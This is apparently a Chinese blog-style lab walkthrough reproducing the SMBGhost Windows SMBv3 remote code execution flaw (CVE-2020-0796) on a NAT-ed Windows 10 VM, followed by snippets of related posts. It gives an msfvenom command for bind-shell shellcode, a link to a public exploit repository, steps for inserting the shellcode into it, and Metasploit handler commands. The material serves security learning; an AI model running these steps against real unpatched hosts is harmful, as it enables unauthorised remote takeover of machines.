代码编织梦想


这是一篇学习他人文章的笔记,如果你对内容感兴趣可以点击下面的链接访问原作者的文章

参考:
漏洞复现 | CVE-2020-0796 (SMBv3远程代码执行) Windows-10
CVE-2020-0796漏洞复现

CVE-2020-0796-简介

漏洞名称

SMB远程代码执行漏洞(CVE-2020-0796),有安全研究者取名“SMBGhost”。

漏洞类型

远程代码执行

漏洞等级

高危

漏洞描述

微软3月11日发布3月例行更新,其中并未公布编号为CVE-2020-0796的高危漏洞资料,但该漏洞却最为引人注目。次日晚(2020年3月12日)微软正式发布CVE-2020-0796高危漏洞补丁。

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。

攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。

该漏洞并未出现在微软3月的例行更新列表,有国外安全厂商意外发布了有关该漏洞存在的消息,随后引发行业关注。

漏洞版本

漏洞不影响win7,漏洞影响Windows 10 1903之后的各个32位、64位版Windows,包括家用版、专业版、企业版、教育版。
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

漏洞复现

准备环境

去msdn下载镜像然后安装系统,由于电脑配置有限,这里我采用NAT,启用一台win10和一台kali,扫描者与受害者都是win10
在这里插入图片描述

发现漏洞

通过奇安信的漏洞检测脚本发现存在漏洞:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

解压后可通过附带的文本文件了解软件的使用方式以及漏洞的修复方式,这里直接探测到,148(就是自己)存在相关漏洞
在这里插入图片描述

修改exp

通过 MSF 生成 shellcode:(用正向)

msfvenom -p windows/x64/meterpreter/bind_tcp lport=9999 -f py -o shellcode.txt

在这里插入图片描述
下载 exp 脚本:

https://github.com/chompie1337/SMBGhost_RCE_PoC.git

把刚刚 MSF 生成的 shellcode.txt 里的 buf 替换成 USER_PAYLOAD
在这里插入图片描述
这个时候解压打开下载下来的exp脚本,打开exploit.py,你会发现这个py文件分为上下两大部分,这个时候把修改过的shellcode.txt的内容替换掉py文件下面那堆文件
【这点也是我最想吐槽的,没怎么见有人说,一直迷惑shellcode.txt怎么跟exploit.py文件搞到一块的,查了半天资料才知道。说人话就是:使用MSF生成一段恶意代码,把这段恶意代码的每行开头的buf替换为USER_PAYLOAD,然后把这段修改过的恶意代码,去替换EXP文件中exploit.py中的,以USER_PAYLOAD开头的那堆代码】
在这里插入图片描述

MSf监听

这个时候 MSF 就可以启动监听了

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 9999
set rhost 192.168.40.148
exploit

在这里插入图片描述

开打

如果打一次,MSF没收到会话,就拿python再打一次,有可能能够拿到会话,也有可能win10蓝屏。我的是win10蓝屏,msf没有拿到会话
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_44288604/article/details/111070786

CVE-2020-0796 SMB远程代码执行漏洞(分析、验证及加固)-爱代码爱编程

0x00 前言      最近一段时间一直忙,挺火的 CVE-2020-0796 (永恒之黑)都没来的及复现,今天趁着网快,赶快把漏洞系统下载下,并且准备了 检测 payload 、蓝屏 payload 、提权payload、命令执行payload,复现一波,相比起来,只是payload不同而已,来实现不同的功能,下面进行分析。 0x01 漏洞描述

Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell-爱代码爱编程

会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。 ---- 网易云热评 本篇内容来自雷石安全实验室。 一、漏洞描述: 该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。   二、测试环境及工具: windows10 1903 64位下载: ed2k://|